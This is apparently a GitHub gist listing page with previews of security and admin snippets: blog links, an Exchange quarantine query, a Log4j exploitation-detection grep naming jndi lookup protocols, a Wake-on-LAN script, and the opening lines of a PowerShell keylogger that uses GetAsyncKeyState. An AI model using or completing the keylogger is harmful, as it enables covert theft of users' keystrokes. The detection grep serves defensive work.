@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@chadmando
chadmando / get-quarantinedmessages.ps1
Created February 23, 2022 17:04
Find all quarantined messages from the last week for all users. Results are grouped by users to make finding messages for specific users easier.
# Must be connected to Exchange Online
# Gets all Quarantined messages from the last week
# Results are grouped by recipient
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined |
Sort-Object -Property RecipientAddress |
Format-Table -GroupBy RecipientAddress
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@TheFreeman193
TheFreeman193 / Updatable Help on GitHub Pages.md
Last active April 1, 2022 21:09
Using GitHub Pages as a container for PowerShell Updatable Help

Using GitHub pages as a container for PowerShell Updatable Help

Introduction

The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is

@cedriczirtacic
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
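from scapy.sendrecv import send
from scapy.layers.inet import IP, UDP
from scapy.packet import Raw
from binascii import unhexlify
import sys
# Build the target MAC as raw bytes from the colon-separated argument
magic = b''
for h in sys.argv[1].split(':'):
    magic += unhexlify(h)
# Magic packet: six 0xff bytes followed by the MAC repeated 16 times, broadcast to UDP port 9
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(b'\xff'*6 + magic*16)))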
@MarkBaggett
MarkBaggett / 1 - pythons_sinister_secrets.md
Last active April 16, 2023 21:37
Come To The Darkside - Pythons Sinister Secrets
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active June 4, 2024 11:34
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
@JasonMorgan
JasonMorgan / TrustedHosts
Last active September 16, 2023 17:57
Setting and modifying Trusted Hosts with PowerShell
## Hey folks, this is just a quick walkthrough on modifying the trusted hosts property in WSMAN using PowerShell
# By default PowerShell loads a PSDrive for the WinRM service
# We modify the trusted hosts property using the Set-Item cmdlet
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.13
#This sets the value to 192.168.1.13, it also overwrites any existing values
# If you want to set a subnet you can use the PowerShell wildcard character
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.*
@9to5IT
9to5IT / Script_Template.ps1
Last active June 5, 2024 14:47
PowerShell: Script Template
#requires -version 2
<#
.SYNOPSIS
<Overview of script>
.DESCRIPTION
<Brief description of script>
.PARAMETER <Parameter_Name>
<Brief description of parameter input required. Repeat this attribute if required>